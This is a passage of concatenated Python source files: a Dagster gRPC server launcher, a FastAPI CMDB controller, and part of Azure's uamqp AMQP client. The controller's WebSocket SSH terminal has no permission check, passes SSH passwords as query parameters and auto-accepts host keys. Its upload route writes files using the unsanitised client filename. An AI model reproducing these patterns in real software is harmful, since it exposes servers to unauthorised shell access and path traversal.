        subprocess_args += loadable_target_origin.get_cli_args()
    server_process = open_ipc_subprocess(subprocess_args)
    from dagster.grpc.client import DagsterGrpcClient
    client = DagsterGrpcClient(
        port=port,
        socket=socket,
        host="localhost",
    )
    try:
        wait_for_grpc_server(server_process, client, subprocess_args, timeout=startup_timeout)
    except:
        # Bare except is intentional: clean up the orphaned subprocess on any
        # failure (including KeyboardInterrupt), then re-raise.
        if server_process.poll() is None:
            server_process.terminate()
        raise
    return server_process
def open_server_process_on_dynamic_port(
    max_retries=10,
    loadable_target_origin=None,
    max_workers=None,
    heartbeat=False,
    heartbeat_timeout=30,
    fixed_server_id=None,
    startup_timeout=20,
):
    """Launch a gRPC server subprocess on a dynamically chosen free port.

    Picks a free port and retries on bind races (another process grabbing the
    port between discovery and bind) up to *max_retries* times.

    Returns:
        (server_process, port): the subprocess handle (None if every attempt
        failed to bind) and the last port attempted (None if no attempt was
        made, i.e. max_retries <= 0).
    """
    server_process = None
    # Initialize port so the return is well-defined even when the retry loop
    # never runs (previously raised UnboundLocalError for max_retries <= 0).
    port = None
    retries = 0
    while server_process is None and retries < max_retries:
        port = find_free_port()
        try:
            server_process = open_server_process(
                port=port,
                socket=None,
                loadable_target_origin=loadable_target_origin,
                max_workers=max_workers,
                heartbeat=heartbeat,
                heartbeat_timeout=heartbeat_timeout,
                fixed_server_id=fixed_server_id,
                startup_timeout=startup_timeout,
            )
        except CouldNotBindGrpcServerToAddress:
            # Bind race lost -- try another free port.
            pass
        retries += 1
    return server_process, port
class GrpcServerProcess:
    """Owns a gRPC server subprocess bound to a port (Windows/forced) or a UDS.

    On construction the subprocess is launched and waited on until reachable;
    raises CouldNotStartServerProcess if it never comes up. Exactly one of
    `self.port` / `self.socket` is set afterwards.
    """

    def __init__(
        self,
        loadable_target_origin=None,
        force_port=False,
        max_retries=10,
        max_workers=None,
        heartbeat=False,
        heartbeat_timeout=30,
        fixed_server_id=None,
        startup_timeout=20,
    ):
        self.port = None
        self.socket = None
        self.server_process = None
        self.loadable_target_origin = check.opt_inst_param(
            loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin
        )
        check.bool_param(force_port, "force_port")
        check.int_param(max_retries, "max_retries")
        check.opt_int_param(max_workers, "max_workers")
        check.bool_param(heartbeat, "heartbeat")
        check.int_param(heartbeat_timeout, "heartbeat_timeout")
        check.invariant(heartbeat_timeout > 0, "heartbeat_timeout must be greater than 0")
        check.opt_str_param(fixed_server_id, "fixed_server_id")
        check.int_param(startup_timeout, "startup_timeout")
        check.invariant(
            max_workers is None or max_workers > 1 if heartbeat else True,
            "max_workers must be greater than 1 or set to None if heartbeat is True. "
            "If set to None, the server will use the gRPC default.",
        )
        # Unix domain sockets are unsupported on Windows, so fall back to a
        # dynamically chosen TCP port there (or when explicitly forced).
        if seven.IS_WINDOWS or force_port:
            self.server_process, self.port = open_server_process_on_dynamic_port(
                max_retries=max_retries,
                loadable_target_origin=loadable_target_origin,
                max_workers=max_workers,
                heartbeat=heartbeat,
                heartbeat_timeout=heartbeat_timeout,
                fixed_server_id=fixed_server_id,
                startup_timeout=startup_timeout,
            )
        else:
            self.socket = safe_tempfile_path_unmanaged()
            self.server_process = open_server_process(
                port=None,
                socket=self.socket,
                loadable_target_origin=loadable_target_origin,
                max_workers=max_workers,
                heartbeat=heartbeat,
                heartbeat_timeout=heartbeat_timeout,
                fixed_server_id=fixed_server_id,
                startup_timeout=startup_timeout,
            )
        if self.server_process is None:
            raise CouldNotStartServerProcess(port=self.port, socket=self.socket)

    @property
    def pid(self):
        """OS process id of the server subprocess."""
        return self.server_process.pid

    def wait(self, timeout=30):
        """Wait for the subprocess to exit, up to *timeout* seconds."""
        if self.server_process.poll() is None:
            seven.wait_for_process(self.server_process, timeout=timeout)

    def create_ephemeral_client(self):
        """Return a client whose context manager shuts this server down on exit."""
        from dagster.grpc.client import EphemeralDagsterGrpcClient
        return EphemeralDagsterGrpcClient(
            port=self.port, socket=self.socket, server_process=self.server_process
        )
|
controller.py | from fastapi import APIRouter, Depends, HTTPException, Request, WebSocket, File, UploadFile
from fastapi.responses import FileResponse
from schema.cmdb import CMDBTypeList, CMDBBase, CMDBItemBase, CMDBItemList
from models.cmdb.models import CMDBType, CMDBItem, CMDBRecord
from models.user.models import User
from core.db import get_db
from core.config import Settings
from api.perm.controller import check_perm
from sqlalchemy.orm import Session
from sqlalchemy import and_, or_, func
from utils.Record import Record
from copy import deepcopy
from typing import Dict
import paramiko
from threading import Thread
import asyncio
import time
import os
from utils.Excel import Excel
cmdb_router = APIRouter()
@cmdb_router.get('/type_list', response_model=CMDBTypeList, name="获取CMDB中所有对象类型")
async def cmdb_type_list(db: Session = Depends(get_db), current_user: User = Depends(check_perm('/cmdb/type_list'))):
    """Return every CMDB object type as a CMDBTypeList payload."""
    type_rows = []
    for row in db.query(CMDBType).all():
        type_rows.append({
            "type_id": str(row.cmdb_type_id),
            "type_name": row.cmdb_type_name,
            "type_label": row.cmdb_type_label,
            "type_icon": row.cmdb_type_icon,
        })
    return CMDBTypeList(types=type_rows)
@cmdb_router.put('/add_type', name="新增CMDB对象类型")
async def cmdb_add_type(new_type: CMDBBase, request: Request, db: Session = Depends(get_db),
                        current_user: User = Depends(check_perm('/cmdb/add_type'))):
    """Create a new CMDB object type; 406 if the type_name already exists."""
    # type_name must be unique
    old_type = db.query(CMDBType).filter(CMDBType.cmdb_type_name == new_type.type_name).first()
    if old_type:
        raise HTTPException(status_code=406, detail="创建的类型已经存在")
    cmdb_type = CMDBType(cmdb_type_name=new_type.type_name, cmdb_type_icon=new_type.type_icon,
                         cmdb_type_label=new_type.type_label)
    # Snapshot before commit so the audit record captures the inserted values.
    new_record = deepcopy(cmdb_type)
    db.add(cmdb_type)
    db.commit()
    # Audit the operation, attributed to the caller's username and IP.
    Record.create_operate_record(username=current_user.username, new_object=new_record, ip=request.client.host)
    return {"message": "类型创建成功"}
@cmdb_router.get('/type_info', name="获取CMDB对象属性")
async def type_info(type_id: str, db: Session = Depends(get_db),
                    current_user: User = Depends(check_perm('/cmdb/type_info'))):
    """Fetch a single CMDB type by id and return it as a CMDBBase payload."""
    found = db.query(CMDBType).filter(CMDBType.cmdb_type_id == int(type_id)).first()
    if found is None:
        raise HTTPException(status_code=406, detail="查询ID不存在")
    return CMDBBase(
        type_id=type_id,
        type_name=found.cmdb_type_name,
        type_label=found.cmdb_type_label,
        type_icon=found.cmdb_type_icon,
    )
@cmdb_router.post('/edit_type', name="修改CMDB对象类型")
async def cmdb_edit_type(edit_type: CMDBBase, request: Request, db: Session = Depends(get_db),
                         current_user: User = Depends(check_perm('/cmdb/edit_type'))):
    """Update the name/icon/label of an existing CMDB type; 406 on conflicts."""
    old_type = db.query(CMDBType).filter(CMDBType.cmdb_type_id == int(edit_type.type_id)).first()
    if not old_type:
        raise HTTPException(status_code=406, detail="要修改的类型不存在")
    if old_type.cmdb_type_name != edit_type.type_name:
        # The name changed, so make sure the new name is not already taken.
        if db.query(CMDBType).filter(CMDBType.cmdb_type_name == edit_type.type_name).first():
            raise HTTPException(status_code=406, detail="修改的类型已存在")
    # Snapshot before/after states for the audit trail.
    old_record = deepcopy(old_type)
    old_type.cmdb_type_name = edit_type.type_name
    old_type.cmdb_type_icon = edit_type.type_icon
    old_type.cmdb_type_label = edit_type.type_label
    new_record = deepcopy(old_type)
    db.add(old_type)
    db.commit()
    Record.create_operate_record(username=current_user.username, old_object=old_record, new_object=new_record,
                                 ip=request.client.host)
    return {"message": "类型修改成功"}
@cmdb_router.get('/get_type_items', name="获取类型下所有的属性")
async def get_type_desc(type_id: str, db: Session = Depends(get_db),
                        current_user: User = Depends(check_perm('/cmdb/get_type_items'))):
    """Return every attribute (item) defined on the given CMDB type."""
    rows = db.query(CMDBItem).filter(CMDBItem.cmdb_type_id == int(type_id)).all()
    items = []
    for row in rows:
        items.append({"item_id": row.item_id, "item_label": row.item_label, "item_name": row.item_name})
    return CMDBItemList(items=items)
@cmdb_router.put('/add_type_item', name="新增类型属性")
async def add_type_desc(request: Request, new_item: CMDBItemBase, db: Session = Depends(get_db),
                        current_user: User = Depends(check_perm('/cmdb/add_type_item'))):
    """Add an attribute (item) to a CMDB type; name and label must both be unique within the type."""
    # Reject duplicates: same type with an identical item name OR label.
    old_item = db.query(CMDBItem).filter(and_(CMDBItem.cmdb_type_id == new_item.cmdb_type_id,
                                              or_(CMDBItem.item_name == new_item.item_name,
                                                  CMDBItem.item_label == new_item.item_label))).first()
    if old_item:
        raise HTTPException(status_code=406, detail="此属性已存在")
    item = CMDBItem(cmdb_type_id=int(new_item.cmdb_type_id), item_name=new_item.item_name,
                    item_label=new_item.item_label)
    # Snapshot before commit so the audit record captures the inserted values.
    new_record = deepcopy(item)
    db.add(item)
    db.commit()
    Record.create_operate_record(username=current_user.username, new_object=new_record, ip=request.client.host)
    return {"message": "属性新增成功"}
@cmdb_router.get('/item_info', name="获取类型属性详情")
def item_info(item_id: str, db: Session = Depends(get_db), current_user: User = Depends(check_perm('/cmdb/item_info'))):
    """Return the detail of a single type attribute as a CMDBItemBase payload."""
    found = db.query(CMDBItem).filter(CMDBItem.item_id == int(item_id)).first()
    if found is None:
        raise HTTPException(status_code=406, detail="查询ID不存在")
    return CMDBItemBase(
        item_id=item_id,
        cmdb_type_id=str(found.cmdb_type_id),
        item_label=found.item_label,
        item_name=found.item_name,
    )
@cmdb_router.post('/edit_type_item', name="修改类型属性")
async def edit_type_item(request: Request, edit_item: CMDBItemBase, db: Session = Depends(get_db),
                         current_user: User = Depends(check_perm('/cmdb/edit_type_item'))):
    """Rename an attribute (name/label) of a CMDB type, with duplicate checks."""
    item_pk = int(edit_item.item_id)  # primary key of the item being edited
    target = db.query(CMDBItem).filter(CMDBItem.item_id == item_pk).first()
    if target is None:
        raise HTTPException(status_code=406, detail="要修改的属性不存在")
    # A changed name/label must not collide with another item of the same type.
    if target.item_name != edit_item.item_name:
        clash = db.query(CMDBItem).filter(and_(CMDBItem.cmdb_type_id == int(edit_item.cmdb_type_id),
                                               CMDBItem.item_name == edit_item.item_name)).first()
        if clash:
            raise HTTPException(status_code=406, detail="要修改的属性名已存在")
    if target.item_label != edit_item.item_label:
        clash = db.query(CMDBItem).filter(and_(CMDBItem.cmdb_type_id == int(edit_item.cmdb_type_id),
                                               CMDBItem.item_label == edit_item.item_label)).first()
        if clash:
            raise HTTPException(status_code=406, detail="要修改的标签名已存在")
    # Snapshot before/after states for the audit trail.
    before = deepcopy(target)
    target.item_name = edit_item.item_name
    target.item_label = edit_item.item_label
    after = deepcopy(target)
    db.add(target)
    db.commit()
    Record.create_operate_record(username=current_user.username, new_object=after, old_object=before,
                                 ip=request.client.host)
    return {"message": "属性修改成功"}
@cmdb_router.get('/instance_lists', name="模型下实例列表")
async def instance_lists(type_id: str, page_no: int, page_size: int, search_str: str = '',
                         db: Session = Depends(get_db),
                         current_user: User = Depends(check_perm('/cmdb/instance_lists'))):
    """Page through the instances (records) of one CMDB type.

    Returns the total match count, the requested page of instances
    (page_no is 1-based), and the type's attribute definitions.
    """
    # Fetch all instances, optionally filtered by a fuzzy LIKE match on the
    # serialized record detail.
    if search_str:
        total = db.query(func.count(CMDBRecord.cmdb_record_id)).filter(and_(CMDBRecord.cmdb_type_id == int(type_id),
                                                                            CMDBRecord.cmdb_record_detail.like(
                                                                                f"%{search_str}%"))).scalar()
        # slice(start, stop) implements the pagination window.
        instances = db.query(CMDBRecord).filter(
            and_(CMDBRecord.cmdb_type_id == int(type_id), CMDBRecord.cmdb_record_detail.like(f"%{search_str}%"))).slice(
            page_size * (page_no - 1), page_size * page_no)
    else:
        total = db.query(func.count(CMDBRecord.cmdb_record_id)).filter(CMDBRecord.cmdb_type_id == int(type_id)).scalar()
        instances = db.query(CMDBRecord).filter(CMDBRecord.cmdb_type_id == int(type_id)).slice(
            page_size * (page_no - 1), page_size * page_no)
    # Also return the attribute definitions of the type.
    items = db.query(CMDBItem).filter(CMDBItem.cmdb_type_id == int(type_id)).all()
    return {"total": total, "instances": [
        {"cmdb_record_id": str(instance.cmdb_record_id), "cmdb_type_id": str(instance.cmdb_type_id),
         "cmdb_record_detail": instance.cmdb_record_detail} for instance in instances], "items": items}
@cmdb_router.put('/add_record', name="新增记录")
async def add_record(request: Request, new_record: Dict[str, str], db: Session = Depends(get_db),
                     current_user: User = Depends(check_perm('/cmdb/add_record'))):
    """Create one CMDB record; the body carries cmdb_type_id plus arbitrary detail key/values."""
    type_id = int(new_record.get("cmdb_type_id", "0"))
    if type_id == 0:
        raise HTTPException(status_code=406, detail="请传入cmdb_type_id")
    # After removing the id key, the remaining dict IS the record detail.
    del new_record['cmdb_type_id']
    if new_record == {}:
        raise HTTPException(status_code=406, detail="未传入记录详情")
    cmdb_record = CMDBRecord()
    cmdb_record.cmdb_type_id = type_id
    # NOTE(review): the dict is stored as-is; presumably the column is a
    # JSON type — confirm against the CMDBRecord model.
    cmdb_record.cmdb_record_detail = new_record
    # Snapshot before commit so the audit record captures the inserted values.
    record = deepcopy(cmdb_record)
    db.add(cmdb_record)
    db.commit()
    Record.create_operate_record(username=current_user.username, new_object=record, ip=request.client.host)
    return {"message": "实例添加成功"}
@cmdb_router.get('/create_cmdb_template/{type_id}', name="下载cmdb模板")
async def create_cmdb_template(type_id: str, db: Session = Depends(get_db),
                               current_user: User = Depends(check_perm('/cmdb/create_cmdb_template'))):
    """Generate and download the Excel import template for one CMDB type."""
    type_id = int(type_id)
    cmdb_type = db.query(CMDBType).filter(CMDBType.cmdb_type_id == type_id).first()
    if not cmdb_type:
        raise HTTPException(status_code=406, detail="上传的类型不存在")
    # Collect every attribute name of the type to use as template columns.
    cmdb_items = db.query(CMDBItem.item_name).filter(CMDBItem.cmdb_type_id == type_id).all()
    keys = [cmdb_item.item_name for cmdb_item in cmdb_items]
    # File naming convention: "{type_name}模板.xlsx"
    filename = f"{cmdb_type.cmdb_type_name}模板.xlsx"
    filepath = os.path.join(Settings.CMDB_FOLDER, filename)
    excel = Excel(filepath=filepath)
    # Regenerate the template from the latest attribute list.
    excel.create_cmdb_template(keys=keys)
    return FileResponse(filepath, filename=filename)
@cmdb_router.post('/import_record/{type_id}', name="导入记录")
async def import_record(request: Request, type_id: str, file: UploadFile = File(...), db: Session = Depends(get_db),
                        current_user: User = Depends(check_perm('/cmdb/import_record'))):
    """Bulk-import CMDB records for a type from an uploaded Excel file.

    The upload is stored as "{type_name}-{millisecond timestamp}-{original name}".
    """
    type_id = int(type_id)
    cmdb_type = db.query(CMDBType).filter(CMDBType.cmdb_type_id == type_id).first()
    if not cmdb_type:
        raise HTTPException(status_code=406, detail="上传的类型不存在")
    # Only .xlsx uploads are accepted.
    if not file.content_type == "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet":
        raise HTTPException(status_code=406, detail="请上传Excel文件")
    cmdb_type_name = cmdb_type.cmdb_type_name
    # Millisecond timestamp keeps stored filenames unique.
    total_miles = str(int(round(time.time() * 1000)))
    store_filename = f"{cmdb_type_name}-{total_miles}-{file.filename}"
    content = await file.read()
    # Persist the raw upload.
    with open(os.path.join(Settings.UPLOAD_FOLDER, store_filename), "wb+") as f:
        f.write(content)
    # Parse the spreadsheet into a list of row dicts.
    excel = Excel(filepath=os.path.join(Settings.UPLOAD_FOLDER, store_filename))
    all_records = excel.import_cmdb_record()
    if len(all_records) == 0:
        raise HTTPException(status_code=406, detail="请填入具体数据")
    # Insert each row as a CMDBRecord.
    # NOTE(review): one commit + one audit write per row; consider batching
    # for large imports.
    for record in all_records:
        cmdb_record = CMDBRecord()
        cmdb_record.cmdb_type_id = type_id
        cmdb_record.cmdb_record_detail = record
        new_record = deepcopy(cmdb_record)
        db.add(cmdb_record)
        db.commit()
        Record.create_operate_record(username=current_user.username, new_object=new_record, ip=request.client.host)
    return {"all_records": all_records}
@cmdb_router.post('/edit_record', name="修改记录")
async def edit_instance(request: Request, edit_record: Dict[str, str], db: Session = Depends(get_db),
                        current_user: User = Depends(check_perm('/cmdb/edit_record'))):
    """Replace the detail payload of an existing CMDB record.

    The body carries cmdb_type_id and cmdb_record_id plus the new detail
    key/values; 406 if either id is missing or the record does not exist.
    """
    type_id = int(edit_record.get("cmdb_type_id", "0"))
    record_id = int(edit_record.get("cmdb_record_id", "0"))
    if type_id == 0 or record_id == 0:
        raise HTTPException(status_code=406, detail="请传入id")
    # After removing the id keys, the remaining dict IS the record detail.
    del edit_record["cmdb_type_id"]
    del edit_record["cmdb_record_id"]
    instance = db.query(CMDBRecord).filter(CMDBRecord.cmdb_record_id == record_id).first()
    # Bug fix: previously a missing record fell through and raised
    # AttributeError on None (HTTP 500); report a client error instead.
    if not instance:
        raise HTTPException(status_code=406, detail="要修改的记录不存在")
    # Snapshot before/after states for the audit trail.
    old_record = deepcopy(instance)
    instance.cmdb_record_detail = edit_record
    new_record = deepcopy(instance)
    db.add(instance)
    db.commit()
    Record.create_operate_record(username=current_user.username, new_object=new_record, old_object=old_record,
                                 ip=request.client.host)
    return {"message": "实例修改成功"}
@cmdb_router.delete('/delete_record', name="删除记录")
async def delete_record(request: Request, record_id: str, db: Session = Depends(get_db),
                        current_user: User = Depends(check_perm('/cmdb/delete_record'))):
    """Delete one CMDB record by id and write an audit entry for it."""
    target = db.query(CMDBRecord).filter(CMDBRecord.cmdb_record_id == int(record_id)).first()
    if target is None:
        raise HTTPException(status_code=406, detail="要删除的ID不存在")
    # Snapshot the row before deletion for the audit trail.
    snapshot = deepcopy(target)
    db.delete(target)
    db.commit()
    Record.create_operate_record(username=current_user.username, old_object=snapshot, ip=request.client.host)
    return {"message": "记录删除成功"}
@cmdb_router.get('/record_details/{record_id}', name="获取记录详情")
async def get_record_details(record_id: str, db: Session = Depends(get_db),
                             current_user: User = Depends(check_perm('/cmdb/record_details'))):
    """Return the stored detail payload of a single CMDB record."""
    found = db.query(CMDBRecord).filter(CMDBRecord.cmdb_record_id == int(record_id)).first()
    if found is None:
        raise HTTPException(status_code=406, detail="此ID信息不存在")
    return {"message": "ok", "record_details": found.cmdb_record_detail}
@cmdb_router.websocket('/web_terminal', name="网页终端")
async def web_ssh(websocket: WebSocket, username: str, password: str, ip: str, port: str,
                  db: Session = Depends(get_db)):
    """WebSocket ↔ SSH bridge: forwards browser keystrokes to an interactive
    shell and streams the shell's output back over the socket.
    """
    await websocket.accept()
    # Connect to the target host.
    ssh_client = paramiko.SSHClient()
    ssh_client.load_system_host_keys()
    ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    ssh_client.connect(ip, int(port), username, password)
    # Bug fix: the old code opened a session channel and requested a PTY on
    # it, then immediately discarded that channel by rebinding
    # `chan = ssh_client.invoke_shell()`. Request the PTY settings directly
    # from invoke_shell instead.
    chan = ssh_client.invoke_shell(term='ansi', width=80, height=40)
    async def send_ssh():
        # Reader coroutine: pump shell output to the websocket until either
        # side closes (best-effort; errors just end the loop).
        try:
            while True:
                result = chan.recv(2048).decode('utf-8')
                await websocket.send_text(result)
        except Exception:
            pass
    # On connect the shell emits two banners (last-login info and the MOTD).
    for _ in range(2):
        login_data = chan.recv(2048).decode('utf-8')
        await websocket.send_text(login_data)
    # Bug fix: this thread was started twice; two competing readers on the
    # same channel split and scramble the output. Start exactly one, as a
    # daemon so it cannot keep the process alive after shutdown.
    Thread(target=asyncio.run, args=(send_ssh(),), daemon=True).start()
    try:
        while True:
            # Forward keystrokes from the browser to the shell.
            data = await websocket.receive_text()
            chan.send(data)
    except Exception as ex:
        print(f"websocket closed:{str(ex)}")
        await websocket.close()
        ssh_client.close()
|
client.py | #-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#--------------------------------------------------------------------------
# pylint: disable=too-many-lines
import logging
import threading
import time
import uuid
from uamqp import (Connection, Session, address, authentication, c_uamqp,
compat, constants, errors, receiver, sender)
from uamqp.constants import TransportType
_logger = logging.getLogger(__name__)
class AMQPClient(object):
"""An AMQP client.
:param remote_address: The AMQP endpoint to connect to. This could be a send target
or a receive source.
:type remote_address: str, bytes or ~uamqp.address.Address
:param auth: Authentication for the connection. This should be one of the subclasses of
uamqp.authentication.AMQPAuth. Currently this includes:
- uamqp.authentication.SASLAnonymous
- uamqp.authentication.SASLPlain
- uamqp.authentication.SASTokenAuth
- uamqp.authentication.JWTTokenAuth
If no authentication is supplied, SASLAnnoymous will be used by default.
:type auth: ~uamqp.authentication.common.AMQPAuth
:param client_name: The name for the client, also known as the Container ID.
If no name is provided, a random GUID will be used.
:type client_name: str or bytes
:param debug: Whether to turn on network trace logs. If `True`, trace logs
will be logged at INFO level. Default is `False`.
:type debug: bool
:param error_policy: A policy for parsing errors on link, connection and message
disposition to determine whether the error should be retryable.
:type error_policy: ~uamqp.errors.ErrorPolicy
:param keep_alive_interval: If set, a thread will be started to keep the connection
alive during periods of user inactivity. The value will determine how long the
thread will sleep (in seconds) between pinging the connection. If 0 or None, no
thread will be started.
:type keep_alive_interval: int
:param max_frame_size: Maximum AMQP frame size. Default is 63488 bytes.
:type max_frame_size: int
:param channel_max: Maximum number of Session channels in the Connection.
:type channel_max: int
:param idle_timeout: Timeout in milliseconds after which the Connection will close
if there is no further activity.
:type idle_timeout: int
:param properties: Connection properties.
:type properties: dict
:param remote_idle_timeout_empty_frame_send_ratio: Ratio of empty frames to
idle time for Connections with no activity. Value must be between
0.0 and 1.0 inclusive. Default is 0.5.
:type remote_idle_timeout_empty_frame_send_ratio: float
:param incoming_window: The size of the allowed window for incoming messages.
:type incoming_window: int
:param outgoing_window: The size of the allowed window for outgoing messages.
:type outgoing_window: int
:param handle_max: The maximum number of concurrent link handles.
:type handle_max: int
:param on_attach: A callback function to be run on receipt of an ATTACH frame.
The function must take 4 arguments: source, target, properties and error.
:type on_attach: func[~uamqp.address.Source, ~uamqp.address.Target, dict, ~uamqp.errors.AMQPConnectionError]
:param send_settle_mode: The mode by which to settle message send
operations. If set to `Unsettled`, the client will wait for a confirmation
from the service that the message was successfully sent. If set to 'Settled',
the client will not wait for confirmation and assume success.
:type send_settle_mode: ~uamqp.constants.SenderSettleMode
:param receive_settle_mode: The mode by which to settle message receive
operations. If set to `PeekLock`, the receiver will lock a message once received until
the client accepts or rejects the message. If set to `ReceiveAndDelete`, the service
will assume successful receipt of the message and clear it from the queue. The
default is `PeekLock`.
:type receive_settle_mode: ~uamqp.constants.ReceiverSettleMode
:param encoding: The encoding to use for parameters supplied as strings.
Default is 'UTF-8'
:type encoding: str
"""
    def __init__(
            self, remote_address, auth=None, client_name=None, debug=False,
            error_policy=None, keep_alive_interval=None, **kwargs):
        # Pop every optional setting out of kwargs; anything left over at the
        # end is unrecognized and raises ValueError below.
        self._encoding = kwargs.pop('encoding', None) or 'UTF-8'
        self._transport_type = kwargs.pop('transport_type', None) or TransportType.Amqp
        self._http_proxy = kwargs.pop('http_proxy', None)
        self._remote_address = remote_address if isinstance(remote_address, address.Address) \
            else address.Address(remote_address)
        self._hostname = self._remote_address.hostname
        if not auth:
            # Derive SASL Plain credentials from the endpoint URI if present.
            username = self._remote_address.username
            password = self._remote_address.password
            if username and password:
                username = compat.unquote_plus(username)
                password = compat.unquote_plus(password)
                auth = authentication.SASLPlain(
                    self._hostname, username, password,
                    http_proxy=self._http_proxy,
                    transport_type=self._transport_type)
        # Fall back to anonymous SASL when no credentials were supplied.
        self._auth = auth if auth else authentication.SASLAnonymous(
            self._hostname,
            http_proxy=self._http_proxy,
            transport_type=self._transport_type)
        # Container ID; random GUID when the caller gave no name.
        self._name = client_name if client_name else str(uuid.uuid4())
        self._debug_trace = debug
        self._counter = c_uamqp.TickCounter()
        self._shutdown = False
        self._connection = None
        # True when the client reuses a caller-supplied (shared) Connection.
        self._ext_connection = False
        self._session = None
        self._backoff = 0
        self._error_policy = error_policy or errors.ErrorPolicy()
        # 0 disables the keep-alive thread (see open()).
        self._keep_alive_interval = int(keep_alive_interval) if keep_alive_interval else 0
        self._keep_alive_thread = None
        # Connection settings
        self._max_frame_size = kwargs.pop('max_frame_size', None) or constants.MAX_FRAME_SIZE_BYTES
        self._channel_max = kwargs.pop('channel_max', None)
        self._idle_timeout = kwargs.pop('idle_timeout', None)
        self._properties = kwargs.pop('properties', None)
        self._remote_idle_timeout_empty_frame_send_ratio = kwargs.pop(
            'remote_idle_timeout_empty_frame_send_ratio', None)
        # Session settings
        self._outgoing_window = kwargs.pop('outgoing_window', None) or constants.MAX_FRAME_SIZE_BYTES
        self._incoming_window = kwargs.pop('incoming_window', None) or constants.MAX_FRAME_SIZE_BYTES
        self._handle_max = kwargs.pop('handle_max', None)
        self._on_attach = kwargs.pop('on_attach', None)
        # Link settings
        self._send_settle_mode = kwargs.pop('send_settle_mode', None) or constants.SenderSettleMode.Unsettled
        self._receive_settle_mode = kwargs.pop('receive_settle_mode', None) or constants.ReceiverSettleMode.PeekLock
        self._desired_capabilities = kwargs.pop('desired_capabilities', None)
        # AMQP object settings
        self.message_handler = None
        self.connection_type = Connection
        self.session_type = Session
        # Any keys still present were not consumed by the pops above.
        if kwargs:
            raise ValueError("Received unrecognized kwargs: {}".format(", ".join(kwargs.keys())))
def __enter__(self):
"""Run Client in a context manager."""
self.open()
return self
def __exit__(self, *args):
"""Close and destroy Client on exiting a context manager."""
self.close()
    def _keep_alive(self):
        """Background loop that pings the connection during user inactivity.

        Runs until the connection is gone or the client shuts down; wakes
        once per second and calls Connection.work() whenever
        `_keep_alive_interval` seconds have elapsed since the last ping.
        """
        start_time = self._counter.get_current_ms()
        try:
            while self._connection and not self._shutdown:
                current_time = self._counter.get_current_ms()
                elapsed_time = (current_time - start_time)/1000  # ms -> seconds
                if elapsed_time >= self._keep_alive_interval:
                    _logger.debug("Keeping %r connection alive.", self.__class__.__name__)
                    self._connection.work()
                    start_time = current_time
                time.sleep(1)
        except Exception as e:  # pylint: disable=broad-except
            # Best-effort: a failed ping must never crash this worker thread.
            _logger.info("Connection keep-alive for %r failed: %r.", self.__class__.__name__, e)
def _client_ready(self): # pylint: disable=no-self-use
"""Determine whether the client is ready to start sending and/or
receiving messages. To be ready, the connection must be open and
authentication complete.
:rtype: bool
"""
return True
    def _client_run(self):
        """Perform a single Connection iteration."""
        # NOTE(review): the base implementation returns None (the work()
        # result is discarded); subclasses presumably override this to
        # return the bool consumed by do_work() — confirm.
        self._connection.work()
    def _redirect(self, redirect, auth):
        """Redirect the client endpoint using a Link DETACH redirect
        response.
        :param redirect: The Link DETACH redirect details.
        :type redirect: ~uamqp.errors.LinkRedirect
        :param auth: Authentication credentials to the redirected endpoint.
        :type auth: ~uamqp.authentication.common.AMQPAuth
        """
        # CBS-owned sessions are torn down by the auth layer; only destroy
        # sessions the client opened itself.
        if not self._connection._cbs:  # pylint: disable=protected-access
            _logger.debug("Closing non-CBS session.")
            self._session.destroy()
        # Drop the old session, swap in the new credentials, redirect the
        # connection, then build a fresh session against the new endpoint.
        self._session = None
        self._auth = auth
        self._hostname = self._remote_address.hostname
        self._connection.redirect(redirect, auth)
        self._build_session()
    def _build_session(self):
        """Build self._session based on current self.connection.

        Three cases:
        - CBS auth needed but not yet attached: create the authenticator
          (which owns its own session) and adopt that session.
        - The connection already has a CBS link: reuse the auth's session.
        - Plain (non-CBS) auth: open a fresh session on the connection.
        """
        # pylint: disable=protected-access
        if not self._connection._cbs and isinstance(self._auth, authentication.CBSAuthMixin):
            self._connection._cbs = self._auth.create_authenticator(
                self._connection,
                debug=self._debug_trace,
                incoming_window=self._incoming_window,
                outgoing_window=self._outgoing_window,
                handle_max=self._handle_max,
                on_attach=self._on_attach)
            self._session = self._auth._session  # pylint: disable=protected-access
        elif self._connection._cbs:
            self._session = self._auth._session  # pylint: disable=protected-access
        else:
            self._session = self.session_type(
                self._connection,
                incoming_window=self._incoming_window,
                outgoing_window=self._outgoing_window,
                handle_max=self._handle_max,
                on_attach=self._on_attach)
    def open(self, connection=None):
        """Open the client. The client can create a new Connection
        or an existing Connection can be passed in. This existing Connection
        may have an existing CBS authentication Session, which will be
        used for this client as well. Otherwise a new Session will be
        created.
        :param connection: An existing Connection that may be shared between
         multiple clients.
        :type connection: ~uamqp.connection.Connection
        """
        # pylint: disable=protected-access
        if self._session:
            return  # already open.
        _logger.debug("Opening client connection.")
        try:
            if connection:
                _logger.debug("Using existing connection.")
                # Adopt the shared connection's auth and hold its lock while
                # attaching our session to it (released in finally).
                self._auth = connection.auth
                self._ext_connection = True
                connection.lock()
            self._connection = connection or self.connection_type(
                self._hostname,
                self._auth,
                container_id=self._name,
                max_frame_size=self._max_frame_size,
                channel_max=self._channel_max,
                idle_timeout=self._idle_timeout,
                properties=self._properties,
                remote_idle_timeout_empty_frame_send_ratio=self._remote_idle_timeout_empty_frame_send_ratio,
                error_policy=self._error_policy,
                debug=self._debug_trace,
                encoding=self._encoding)
            self._build_session()
            # Optional daemon thread that pings the connection during idle
            # periods (see _keep_alive); 0/None interval disables it.
            if self._keep_alive_interval:
                self._keep_alive_thread = threading.Thread(target=self._keep_alive)
                self._keep_alive_thread.daemon = True
                self._keep_alive_thread.start()
        finally:
            if self._ext_connection:
                connection.release()
    def close(self):
        """Close the client. This includes closing the Session
        and CBS authentication layer as well as the Connection.
        If the client was opened using an external Connection,
        this will be left intact.
        No further messages can be sent or received and the client
        cannot be re-opened.
        All pending, unsent messages will remain uncleared to allow
        them to be inspected and queued to a new client.
        """
        # Tear down the message link first, if one was created.
        if self.message_handler:
            self.message_handler.destroy()
            self.message_handler = None
        # Signal the keep-alive thread to exit and wait for it.
        self._shutdown = True
        if self._keep_alive_thread:
            self._keep_alive_thread.join()
            self._keep_alive_thread = None
        if not self._session:
            return  # already closed.
        if not self._connection._cbs:  # pylint: disable=protected-access
